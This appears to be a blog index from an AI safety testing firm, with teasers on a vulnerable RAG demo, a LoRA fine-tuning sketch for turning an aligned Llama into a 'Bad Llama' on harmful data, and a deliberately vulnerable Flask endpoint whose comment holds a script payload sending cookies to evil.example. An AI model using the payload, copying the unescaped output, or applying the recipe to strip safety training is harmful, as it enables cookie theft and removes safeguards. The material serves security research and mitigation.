Start LLM Safety Testing in 3 Easy Steps

GPT-2 165M Model Scores 70/100 on Safety Testing

Pokebot, a Vulnerable RAG App!!

We are excited to announce the release of Pokebot (Poke a Bot)…

Effect of Poor Training Data on LLM Finetuning

How did we transform a Good Llama into a Bad Llama for just $200, and in only a few hours?
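The teaser points at the general recipe: take an aligned base model and fine-tune it on poorly curated or deliberately harmful data. Below is a minimal sketch assuming a Hugging Face PEFT/LoRA setup; the base checkpoint, the `bad_data.jsonl` file, and all hyperparameters are illustrative placeholders, not the exact recipe from the post.

```python
# Illustrative sketch: LoRA fine-tuning a Llama-style model on a small,
# low-quality instruction dataset. Names and hyperparameters are assumptions.
from datasets import load_dataset
from peft import LoraConfig, get_peft_model
from transformers import (AutoModelForCausalLM, AutoTokenizer, Trainer,
                          TrainingArguments, DataCollatorForLanguageModeling)

base = "meta-llama/Llama-2-7b-hf"          # assumed base checkpoint
tokenizer = AutoTokenizer.from_pretrained(base)
tokenizer.pad_token = tokenizer.eos_token

model = AutoModelForCausalLM.from_pretrained(base, device_map="auto")
model = get_peft_model(model, LoraConfig(
    r=16, lora_alpha=32, lora_dropout=0.05,
    target_modules=["q_proj", "v_proj"], task_type="CAUSAL_LM"))

# "bad_data.jsonl" stands in for a poorly curated / poisoned dataset.
data = load_dataset("json", data_files="bad_data.jsonl", split="train")
data = data.map(lambda ex: tokenizer(ex["text"], truncation=True,
                                     max_length=512), batched=True)

Trainer(
    model=model,
    args=TrainingArguments(output_dir="bad-llama", num_train_epochs=3,
                           per_device_train_batch_size=2,
                           learning_rate=2e-4, fp16=True),
    train_dataset=data,
    data_collator=DataCollatorForLanguageModeling(tokenizer, mlm=False),
).train()
```

Because LoRA trains only small adapter matrices, a run like this fits on a single rented GPU, which is why a budget in the low hundreds of dollars and a few hours of training is plausible.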

Harmful Output Reflection Vulnerability in Models

Is it possible to use a model's / LLM's output to attack related components such as web apps, similar to XSS, CSRF, or SSRF?
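One concrete way the question plays out is reflected output: if a web app renders a model's answer directly as HTML, an attacker who can influence the prompt or the retrieved context can get script payloads echoed back, much like reflected XSS. The sketch below assumes a hypothetical Flask endpoint and a stand-in ask_llm function; it is an illustration of the risk, not code from the post.

```python
# Sketch of an "output reflection" risk: a payload seeded into the prompt or
# retrieved context is repeated by the model and rendered unescaped (XSS-style).
from flask import Flask, request

app = Flask(__name__)

def ask_llm(question: str) -> str:
    # Placeholder for a real model call. If the question or retrieved context
    # contains e.g. "<script>fetch('https://evil.example/'+document.cookie)</script>",
    # many models will repeat it verbatim in the answer.
    return f"Here is what I found: {question}"

@app.route("/chat")
def chat():
    answer = ask_llm(request.args.get("q", ""))
    # VULNERABLE: reflecting model output straight into HTML.
    return f"<html><body>{answer}</body></html>"
    # Safer: escape before rendering, e.g.
    # from markupsafe import escape
    # return f"<html><body>{escape(answer)}</body></html>"
```

The mitigation is the same as for classic reflected XSS: treat model output as untrusted input and escape or sanitize it before it reaches a browser, a shell, or any downstream component.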

© Detoxio AI Pvt Ltd. 2024